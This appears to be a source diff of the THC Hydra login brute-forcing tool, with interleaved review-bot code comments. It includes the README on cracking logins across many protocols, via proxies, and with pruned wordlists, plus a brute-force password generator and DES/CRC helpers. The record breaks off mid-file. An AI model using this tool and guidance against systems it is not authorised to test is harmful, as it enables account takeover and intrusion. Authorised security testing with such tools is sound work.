rm -rf xhydra pw-inspector hydra *.o core *.core *.stackdump *~ Makefile.in Makefile dev_rfc hydra.restore arm/*.ipk arm/ipkg/usr/bin/* hydra-gtk/src/*.o hydra-gtk/src/xhydra hydra-gtk/stamp-h hydra-gtk/config.status hydra-gtk/errors hydra-gtk/config.log hydra-gtk/src/.deps hydra-gtk/src/Makefile hydra-gtk/Makefile
cp -f Makefile.orig Makefile
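Review bot: in the OBJ list, the entry `hydra-s7-300.c` on the `hydra-rdp.o` line should be `hydra-s7-300.o`. As written, the S7-300 module never goes through the `.c.o` rule; the source file is handed to the final `$(CC) ... -o hydra` command instead, so it is recompiled on every link and no `hydra-s7-300.o` is produced. Separately, the install recipe writes dpl4hydra.sh to `$(PREFIX)/bin/` while the binaries go to `$(PREFIX)$(DIR)`, and most install steps are prefixed with `-`, so a failed mkdir or cp is ignored and `make install` still reports success. Use `$(DIR)` consistently and drop the `-` where a failure should stop the install.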

5
Makefile.orig Normal file

@ -0,0 +1,5 @@
all:
@echo Error: you must run "./configure" first
clean:
cp -f Makefile.orig Makefile

2
Makefile.unix Normal file

@ -0,0 +1,2 @@
CC=gcc
STRIP=strip

229
README Normal file

@ -0,0 +1,229 @@
H Y D R A
(c) 2001-2014 by van Hauser / THC
<vh@thc.org> http://www.thc.org
co-maintained by David (dot) Maciejak @ gmail (dot) com
BFG code by Jan Dlabal <dlabaljan@gmail.com>
Licensed under AGPLv3 (see LICENSE file)
INTRODUCTION
------------
Number one of the biggest security holes are passwords, as every password
security study shows.
This tool is a proof of concept code, to give researchers and security
consultants the possiblity to show how easy it would be to gain unauthorized
access from remote to a system.
THIS TOOL IS FOR LEGAL PURPOSES ONLY!
There are already several login hacker tools available, however none does
either support more than one protocol to attack or support parallized
connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD
and OSX.
Currently this tool supports:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
However the module engine for new services is very easy so it won't take a
long time until even more services are supported.
Your help in writing, enhancing or fixing modules is highly appreciated!! :-)
HOW TO COMPILE
--------------
For hydra, just type:
./configure
make
make install
If you need ssh module support, you have to setup libssh on your system,
get it from http://www.libssh.org, for ssh v1 support you also need to add
"-DWITH_SSH1=On" option in the cmake command line.
If you use Ubuntu, this will install supplementary libraries needed for a
few optional modules:
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
firebird2.1-dev libncp-dev
This enables all optional modules and features with the exception of Oracle,
SAP R/3 and the apple filing protocol - which you will need to download and
install from the vendor's web sites.
For all other Linux derivates and BSD based systems, use the system
software installer and look for similar named libraries like in the
comand above. In all other cases you have to download all source libraries
and compile them manually.
SUPPORTED PLATFORMS
-------------------
All UNIX platforms (linux, *bsd, solaris, etc.)
Mac OS/X
Windows with Cygwin (both ipv4 and ipv6)
Mobile systems based on Linux or Mac OS/X (e.g. Android, iPhone, Zaurus, iPaq)
HOW TO USE
----------
Type "./configure", followed by "make" to compile hydra and then
"./hydra -h" to see the command line options.
You make also type "make install" to install hydra to /usr/local/bin.
Note that NO login/password file is included. Generate them yourself.
For Linux users, a GTK gui is available, try "./xhydra"
SPECIAL OPTIONS FOR MODULES
---------------------------
Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m
commandline option, you can pass one option to a module.
Many modules use this, a few require it!
To see the special option of a module, type:
hydra -U <module>
e.g.
./hydra -U http-post-form
The special options can be passed via the -m parameter, as 3rd command line
option or in the service://target/option format.
Examples (they are all equal):
./hydra -l test -p test -m PLAIN 127.0.0.1 imap
./hydra -l test -p test 127.0.0.1 imap PLAIN
./hydra -l test -p test imap://127.0.0.1/PLAIN
RESTORING AN ABORTED/CRASHED SESSION
------------------------------------
When hydra is aborted with Control-C, killed or crashs, it leavs a
"hydra.restore" file behind which contains all necessary information to
restore the session. This session file is written every 5 minutes.
NOTE: if you are cracking parallel hosts (-M option), this feature doesnt
work, and is therefore disabled!
NOTE: the hydra.restore file can NOT be copied to a different platform (e.g.
from little indian to big indian, or from solaris to aix)
HOW TO SCAN/CRACK OVER A PROXY
------------------------------
The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works
just for the http/www service!).
The following syntax is valid:
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
For all other services, use the HYDRA_PROXY variable to scan/crack
via by default a web proxy's CONNECT call. It uses the same syntax. eg:
HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port
for example:
HYDRA_PROXY=http://proxy.anonymizer.com:8000
If you require authentication for the proxy, use the HYDRA_PROXY_AUTH
environment variable:
HYDRA_PROXY_AUTH="the_login:the_password"
ADDITIONAL HINTS
----------------
* sort your password files by likelihood and use the -u option to find
passwords much faster!
* uniq your dictionary files! this can save you a lot of time :-)
cat words.txt | sort | uniq > dictionary.txt
* if you know that the target is using a password policy (allowing users
only to choose password with a minimum length of 6, containing a least one
letter and one number, etc. use the tool pw-inspector which comes along
with the hydra package to reduce the password list:
cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt
SPEED
-----
through the parallizing feature, this password cracker tool can be very
fast, however it depends on the protocol. The fastest are generally POP3
and FTP.
Experiment with the task option (-t) to speed things up! The higher - the
faster ;-) (but too high - and it disables the service)
STATISTICS
----------
Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing
295 entries (294 tries invalid logins, 1 valid). Every test was run three
times (only for "1 task" just once), and the average noted down.
P A R A L L E L T A S K S
SERVICE 1 4 8 16 32 50 64 100 128
------- --------------------------------------------------------------------
telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55*
ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32
pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50
imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21
(*)
Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with
128 tasks, running four times resulted in timings between 28 and 97 seconds!
The reason for this is unknown...
guesses per task (rounded up):
295 74 38 19 10 6 5 3 3
guesses possible per connect (depends on the server software and config):
telnet 4
ftp 6
pop3 1
imap 3
BUGS & FEATURES
---------------
Hydra:
Email me or David if you find bugs or if you have written a new module.
vh@thc.org (and put "antispam" in the subject line)
David (dot) Maciejak @ gmail (dot) com
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i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=MdzX
-----END PGP PUBLIC KEY BLOCK-----
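Review bot: in the RESTORING AN ABORTED/CRASHED SESSION section, "from little indian to big indian" should read "little endian to big endian"; as written, the portability restriction on hydra.restore is hard to understand. The same pass could fix "possiblity", "parallized", "comand", "crashs, it leavs" and "You make also type". In HOW TO COMPILE, the "-DWITH_SSH1=On" option is described as going "in the cmake command line" without saying which build that refers to, while hydra itself is built with ./configure; one clarifying clause would help.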

204
bfg.c Normal file

@ -0,0 +1,204 @@
/* code original by Jan Dlabal <dlabaljan@gmail.com>, partially rewritten by vh */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <ctype.h>
#include "bfg.h"
bf_option bf_options;
#ifdef HAVE_MATH_H
extern int debug;
// return values : 0 on success, 1 on error
//
// note that we check for -x .:.:ab but not for -x .:.:ba
//
int bf_init(char *arg) {
int i = 0;
int crs_len = 0;
char flags = 0;
char *tmp = strchr(arg, ':');
if (!tmp) {
fprintf(stderr, "Error: Invalid option format for -x\n");
return 1;
} else {
tmp[0] = '\0';
}
bf_options.from = atoi(arg);
if (bf_options.from < 1 || bf_options.from > 127) {
fprintf(stderr, "Error: minimum length must be between 1 and 127, format: -x min:max:types\n");
return 1;
}
arg = tmp + 1;
tmp++;
if (!arg[0]) {
fprintf(stderr, "Error: no maximum length specified for -x min:max:types!\n");
return 1;
}
tmp = strchr(arg, ':');
if (!tmp) {
fprintf(stderr, "Error: Invalid option format for -x\n");
return 1;
} else {
tmp[0] = '\0';
}
bf_options.to = atoi(arg);
tmp++;
if (bf_options.from > bf_options.to) {
fprintf(stderr, "Error: you specified a minimum length higher than the maximum length!\n");
return 1;
}
if (tmp[0] == 0) {
fprintf(stderr, "Error: charset not specified!\n");
return 1;
}
bf_options.crs = malloc(sizeof(char) * BF_CHARSMAX);
if (bf_options.crs == NULL) {
fprintf(stderr, "Error: can't allocate enough memory!\n");
return 1;
}
bf_options.crs[0] = 0;
for (; tmp[i]; i++) {
switch (tmp[i]) {
case 'a':
crs_len += 26;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_LOWER) {
free(bf_options.crs);
fprintf(stderr, "Error: 'a' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "abcdefghijklmnopqrstuvwxyz");
flags |= BF_LOWER;
}
break;
case 'A':
crs_len += 26;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_UPPER) {
free(bf_options.crs);
fprintf(stderr, "Error: 'A' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "ABCDEFGHIJKLMNOPQRSTUVWXYZ");
flags |= BF_UPPER;
}
break;
case '1':
crs_len += 10;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_NUMS) {
free(bf_options.crs);
fprintf(stderr, "Error: '1' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "0123456789");
flags |= BF_NUMS;
}
break;
default:
if ((tmp[i] >= '2' && tmp[i] <= '9') || tmp[i] == '0') {
if ((flags & BF_NUMS) > 0) {
printf("[ERROR] character %c defined in -x although the whole number range was already defined by '1', ignored\n", tmp[i]);
continue;
}
printf("[WARNING] adding character %c for -x, note that '1' will add all numbers from 0-9\n", tmp[i]);
}
if (tolower((int) tmp[i]) >= 'b' && tolower((int) tmp[i]) <= 'z') {
if ((tmp[i] <= 'Z' && (flags & BF_UPPER) > 0) || (tmp[i] > 'Z' && (flags & BF_UPPER) > 0)) {
printf("[ERROR] character %c defined in -x although the whole letter range was already defined by '%c', ignored\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a');
continue;
}
printf("[WARNING] adding character %c for -x, note that '%c' will add all %scase letters\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a', tmp[i] <= 'Z' ? "up" : "low");
}
crs_len++;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else {
bf_options.crs[crs_len - 1] = tmp[i];
bf_options.crs[crs_len] = '\0';
}
break;
}
}
bf_options.crs_len = crs_len;
bf_options.current = bf_options.from;
memset((char *) bf_options.state, 0, sizeof(bf_options.state));
if (debug)
printf("[DEBUG] bfg INIT: from %d, to %d, len: %d, set: %s\n", bf_options.from, bf_options.to, bf_options.crs_len, bf_options.crs);
return 0;
}
unsigned long int bf_get_pcount() {
int i;
unsigned long int count = 0;
for (i = bf_options.from; i <= bf_options.to; i++)
count += (unsigned long int) (pow((float) bf_options.crs_len, (float) i));
return count;
}
char *bf_next() {
int i, pos = bf_options.current - 1;
if (bf_options.current > bf_options.to)
return NULL; // we are done
if ((bf_options.ptr = malloc(BF_CHARSMAX)) == NULL) {
fprintf(stderr, "Error: Can not allocate memory for -x data!\n");
return NULL;
}
for (i = 0; i < bf_options.current; i++)
bf_options.ptr[i] = bf_options.crs[bf_options.state[i]];
bf_options.ptr[bf_options.current] = 0;
if (debug) {
printf("[DEBUG] bfg IN: len %d, from %d, current %d, to %d, state:", bf_options.crs_len, bf_options.from, bf_options.current, bf_options.to);
for (i = 0; i < bf_options.current; i++)
printf(" %d", bf_options.state[i]);
printf(", x: %s\n", bf_options.ptr);
}
while (pos >= 0 && (++bf_options.state[pos]) >= bf_options.crs_len) {
bf_options.state[pos] = 0;
pos--;
}
if (pos < 0) {
bf_options.current++;
memset((char *) bf_options.state, 0, sizeof(bf_options.state));
}
return bf_options.ptr;
}
#endif
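Review bot: in the `default:` branch of bf_init, the duplicate-letter test checks BF_UPPER on both sides: `(tmp[i] <= 'Z' && (flags & BF_UPPER) > 0) || (tmp[i] > 'Z' && (flags & BF_UPPER) > 0)`. The second half should test BF_LOWER; as written, a lowercase letter given after 'a' (for example `ab`) is appended a second time, and a lowercase letter given after 'A' is rejected as already covered. Also, `bf_options.to` is assigned straight from atoi() with no range check, unlike `from`. Both fields are unsigned char in bfg.h, so the value is narrowed before any comparison, and with a maximum of 255 the `bf_options.current++` in bf_next wraps to 0 instead of exceeding `to`, so the generator never terminates. Parse into an int, validate against an explicit upper bound, then assign. bf_get_pcount sums `pow((float) ...)` results into an unsigned long, which loses precision and can overflow for larger ranges; an integer loop with an overflow check would be safer.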

53
bfg.h Normal file

@ -0,0 +1,53 @@
/* (c) 2008 Jan Dlabal <dlabaljan@gmail.com> */
/* */
/* This file is part of the bfg. */
/* */
/* bfgen is free software: you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation, either version 3 of the License, or */
/* any later version. */
/* */
/* bfgen is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with bfgen. If not, see <http://www.gnu.org/licenses/>. */
#ifndef BF_H
#define BF_H
#define BF_NAME "bfg"
#define BF_VERSION "v0.3"
#define BF_YEAR "2009"
#define BF_WEBSITE "http://houbysoft.com/bfg/"
#define BF_BUFLEN 1024
#define BF_CHARSMAX 256 /* how many max possibilities there are for characters, normally it's 2^8 = 256 */
#define BF_LOWER 1
#define BF_UPPER 2
#define BF_NUMS 4
typedef struct {
unsigned char from;
unsigned char to;
unsigned char current;
unsigned char state[BF_CHARSMAX]; /* which position has which character */
unsigned char pos; /* where in current string length is the position */
unsigned char crs_len; /* length of selected charset */
char *arg; /* argument received for bfg commandline option */
char *crs; /* internal representation of charset */
char *ptr; /* ptr to the last generated password */
} bf_option;
extern bf_option bf_options;
#ifdef HAVE_MATH_H
extern unsigned long int bf_get_pcount();
extern int bf_init(char *arg);
extern char *bf_next();
#endif
#endif
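Review bot: the comment on `ptr` ("ptr to the last generated password") and the `bf_next()` prototype do not say who owns the returned buffer, yet bf_next in bfg.c allocates a fresh BF_CHARSMAX block on every call and overwrites `bf_options.ptr`. Document at the prototype that the caller must free() each returned string, or have bf_next reuse a single buffer. The `pos` and `arg` members are not referenced anywhere in bfg.c and could be dropped, and `bf_get_pcount()` and `bf_next()` would be better declared with `(void)`.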

1064
configure vendored Executable file

File diff suppressed because it is too large

103
crc32.c Normal file

@ -0,0 +1,103 @@
/*-
* COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or
* code or tables extracted from it, as desired without restriction.
*
* First, the polynomial itself and its table of feedback terms. The
* polynomial is
* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0
*
* Note that we take it "backwards" and put the highest-order term in
* the lowest-order bit. The X^32 term is "implied"; the LSB is the
* X^31 term, etc. The X^0 term (usually shown as "+1") results in
* the MSB being 1
*
* Note that the usual hardware shift register implementation, which
* is what we're using (we're merely optimizing it by doing eight-bit
* chunks at a time) shifts bits into the lowest-order term. In our
* implementation, that means shifting towards the right. Why do we
* do it this way? Because the calculated CRC must be transmitted in
* order from highest-order term to lowest-order term. UARTs transmit
* characters in order from LSB to MSB. By storing the CRC this way
* we hand it to the UART in the order low-byte to high-byte; the UART
* sends each low-bit to hight-bit; and the result is transmission bit
* by bit from highest- to lowest-order term without requiring any bit
* shuffling on our part. Reception works similarly
*
* The feedback terms table consists of 256, 32-bit entries. Notes
*
* The table can be generated at runtime if desired; code to do so
* is shown later. It might not be obvious, but the feedback
* terms simply represent the results of eight shift/xor opera
* tions for all combinations of data and CRC register values
*
* The values must be right-shifted by eight bits by the "updcrc
* logic; the shift must be unsigned (bring in zeroes). On some
* hardware you could probably optimize the shift in assembler by
* using byte-swap instructions
* polynomial $edb88320
*
*
* CRC32 code derived from work by Gary S. Brown.
*/
#include <sys/types.h>
unsigned int crc32_tab[] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d
};
unsigned int crc32(const void *buf, unsigned int size) {
const unsigned char *p;
unsigned int crc;
p = buf;
crc = ~0U;
while (size--)
crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);
return crc ^ ~0U;
}
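Review bot: crc32_tab is declared as a plain `unsigned int crc32_tab[]`, which makes the lookup table a writable global with external linkage. Only crc32() in this file reads it, so declare it `static const`; it then lands in read-only data and cannot be modified or collide with another symbol at link time. The table and the `crc` accumulator also assume that `unsigned int` is exactly 32 bits wide (on a wider int the final `crc ^ ~0U` would return extra high bits); `uint32_t` from <stdint.h> states that requirement, and nothing in the file needs `#include <sys/types.h>`.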

8
crc32.h Normal file

@ -0,0 +1,8 @@
#ifndef CRC32_H
#define CRC32_H
#include <sys/types.h>
unsigned int crc32(const void *buf, unsigned int size);
#endif
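Review bot: the prototype exports the unprefixed name crc32, which zlib also exports with a different signature (zlib's version takes the running CRC as its first argument), so a build that also links zlib risks a symbol clash. A project prefix such as hydra_crc32 would avoid it (the name is only a suggestion). The length parameter would be better as size_t than `unsigned int`, and nothing declared here needs <sys/types.h>.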

469
d3des.c Normal file

@ -0,0 +1,469 @@
/* 2001 van Hauser for Hydra: commented out KnR Kn3 and Df_Key to remove
compiler warnings for unused definitions.
*/
/*
* This is D3DES (V5.09) by Richard Outerbridge with the double and
* triple-length support removed for use in VNC. Also the bytebit[] array
* has been reversed so that the most significant bit in each byte of the
* key is ignored, not the least significant.
*
* These changes are:
* Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/
/* D3DES (V5.09) -
*
* A portable, public domain, version of the Data Encryption Standard.
*
* Written with Symantec's THINK (Lightspeed) C by Richard Outerbridge.
* Thanks to: Dan Hoey for his excellent Initial and Inverse permutation
* code; Jim Gillogly & Phil Karn for the DES key schedule code; Dennis
* Ferguson, Eric Young and Dana How for comparing notes; and Ray Lau,
* for humouring me on.
*
* Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge.
* (GEnie : OUTER; CIS : [71755,204]) Graven Imagery, 1992.
*/
#include "d3des.h"
static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);
static unsigned long KnL[32] = { 0L };
/* not needed ...
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };
*/
static unsigned short bytebit[8] = {
01, 02, 04, 010, 020, 040, 0100, 0200
};
static unsigned long bigbyte[24] = {
0x800000L, 0x400000L, 0x200000L, 0x100000L,
0x80000L, 0x40000L, 0x20000L, 0x10000L,
0x8000L, 0x4000L, 0x2000L, 0x1000L,
0x800L, 0x400L, 0x200L, 0x100L,
0x80L, 0x40L, 0x20L, 0x10L,
0x8L, 0x4L, 0x2L, 0x1L
};
/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17,
9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35,
62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21,
13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3
};
static unsigned char totrot[16] = {
1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28
};
static unsigned char pc2[48] = {
13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9,
22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31
};
void deskey(key, edf) /* Thanks to James Gillogly & Phil Karn! */
unsigned char *key;
int edf;
{
register int i, j, l, m, n;
unsigned char pc1m[56], pcr[56];
unsigned long kn[32];
for (j = 0; j < 56; j++) {
l = pc1[j];
m = l & 07;
pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
}
for (i = 0; i < 16; i++) {
if (edf == DE1)
m = (15 - i) << 1;
else
m = i << 1;
n = m + 1;
kn[m] = kn[n] = 0L;
for (j = 0; j < 28; j++) {
l = j + totrot[i];
if (l < 28)
pcr[j] = pc1m[l];
else
pcr[j] = pc1m[l - 28];
}
for (j = 28; j < 56; j++) {
l = j + totrot[i];
if (l < 56)
pcr[j] = pc1m[l];
else
pcr[j] = pc1m[l - 28];
}
for (j = 0; j < 24; j++) {
if (pcr[pc2[j]])
kn[m] |= bigbyte[j];
if (pcr[pc2[j + 24]])
kn[n] |= bigbyte[j];
}
}
cookey(kn);
return;
}
static void cookey(raw1)
register unsigned long *raw1;
{
register unsigned long *cook, *raw0;
unsigned long dough[32];
register int i;
cook = dough;
for (i = 0; i < 16; i++, raw1++) {
raw0 = raw1++;
*cook = (*raw0 & 0x00fc0000L) << 6;
*cook |= (*raw0 & 0x00000fc0L) << 10;
*cook |= (*raw1 & 0x00fc0000L) >> 10;
*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
*cook = (*raw0 & 0x0003f000L) << 12;
*cook |= (*raw0 & 0x0000003fL) << 16;
*cook |= (*raw1 & 0x0003f000L) >> 4;
*cook++ |= (*raw1 & 0x0000003fL);
}
usekey(dough);
return;
}
void cpkey(into)
register unsigned long *into;
{
register unsigned long *from, *endp;
from = KnL, endp = &KnL[32];
while (from < endp)
*into++ = *from++;
return;
}
void usekey(from)
register unsigned long *from;
{
register unsigned long *to, *endp;
to = KnL, endp = &KnL[32];
while (to < endp)
*to++ = *from++;
return;
}
void des(unsigned char *inblock, unsigned char *outblock) {
unsigned long work[2];
scrunch(inblock, work);
desfunc(work, KnL);
unscrun(work, outblock);
return;
}
static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into++ |= (*outof++ & 0xffL);
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into |= (*outof & 0xffL);
return;
}
static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> 8) & 0xffL;
*into++ = *outof++ & 0xffL;
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> 8) & 0xffL;
*into = *outof & 0xffL;
return;
}
static unsigned long SP1[64] = {
0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
